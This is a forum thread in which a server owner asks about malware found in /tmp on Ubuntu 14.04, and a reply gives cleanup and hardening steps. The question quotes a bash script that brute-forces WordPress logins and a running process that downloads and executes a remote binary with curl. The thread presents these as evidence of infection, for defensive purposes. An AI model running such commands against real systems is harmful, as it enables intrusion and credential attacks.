# Unusual files in temp folder UBUNTU SERVER 14.04

Tags: linux, security, ubuntu-14.04

I have unusual files in ubuntu tmp folder. Can any one shed some light on it and what could be my prevention steps.

In temp folder there are 2 file named
**Script** and **URL**

*When I nano **script** file:*

```
#!/bin/bash
if curl -s  --max-time 7 -d "log=$1" -d "pwd=$2" -d "wp-submit=Log+In" 
"$3"/wp-login.php  -i |grep -a "path=/wp-content/pl$

then
echo $3 $1 $2
fi
```

*and nano **url** shows non readable results*

Further the following malicious process is running on HTOP command

```
\par 2 S  0.0  0.0  0:00.00 sh -c cd /tmp;rm -rf url*;cd /tmp;rm -rf url;curl -O socks5.so/url;chmod 777 url;./url
\par 4 S  0.0  0.0  0:00.00 ./url
```

When inquire the process id:

```
#ls -al /proc/12186/exe

Output is:
someuser someuser 0 Jun 17 06:06 /proc/12186/exe -> /bin/dash
```

when i remove files in TEMP folder it keeps on regenerating, how can i stop this  .I believe it is using my server to attack word press installed websites.

Answer (score 0, accepted):

You've been *p0wned*. It can be extremely difficult to get rid of this.

You may download the package *rkhunter*, update it,

```
    rkhunter --update
```

disconnect your pc from the network, run it:

```
    rkhunter -c
```

If it reports the presence of a rootkit, your best chance is to re-install the OS. In fact, the presence of a rootkit in general indicates a savvy and well-equipped opponent, fighting whom it is possible but only with lots of time and technical competence, which is way more than the format of this forum can offer.

If instead there is no trace of a rootkit, then you can start (your pc still off the net) cleaning your pc as follows:

1. change your password;
2. edit the sudo file (with visudo) and get rid of all users which are not system users, or yourself.
3. search for (eventual) other users, with a login shell in /etc/passwd, and remove them.
4. remove these users' home directories.
5. disable the ssh daemon altogether.
6. Set a watch by means of *inotifywait* on common system files, like /var/log/wtmp.
7. setup iptables to log all connection attempts, and to block all connection traffic except that on a non-standard port for ssh, and that related to existing connections initiated by yourself.

Then when you go back online, download *fail2ban* without installing it, get off the net, start the ssh daemon, install fail2ban.

Now change your ssh to only use cryptographic keys, to bar root logins and password logins. Now you can go back to the internet, and read some  [reasonable blog page on how to secure your Linux machine](http://www.techradar.com/news/software/operating-systems/how-to-secure-your-linux-system-915651).

Comment: i would rather consider changing server ,but there are lots of infected files too with hex code inside is there is any tool for searching hexcode inside the files?

Comment: So you have found someone competent. There are programs which search code introduced into system files: they are called Intrusion Detection Sytems, like Snort. If you want to look at one of them, there are *hexadecimal editors* like Bless, dhex, you can find them discussed here: *https://en.wikipedia.org/wiki/Comparison_of_hex_editors*.  But chances are, by the time you do something, this guy will have counteracted your moves. My best suggestion is:  reinstall everything, then learn how to secure your system. You have my sympathy, if it is any consolation.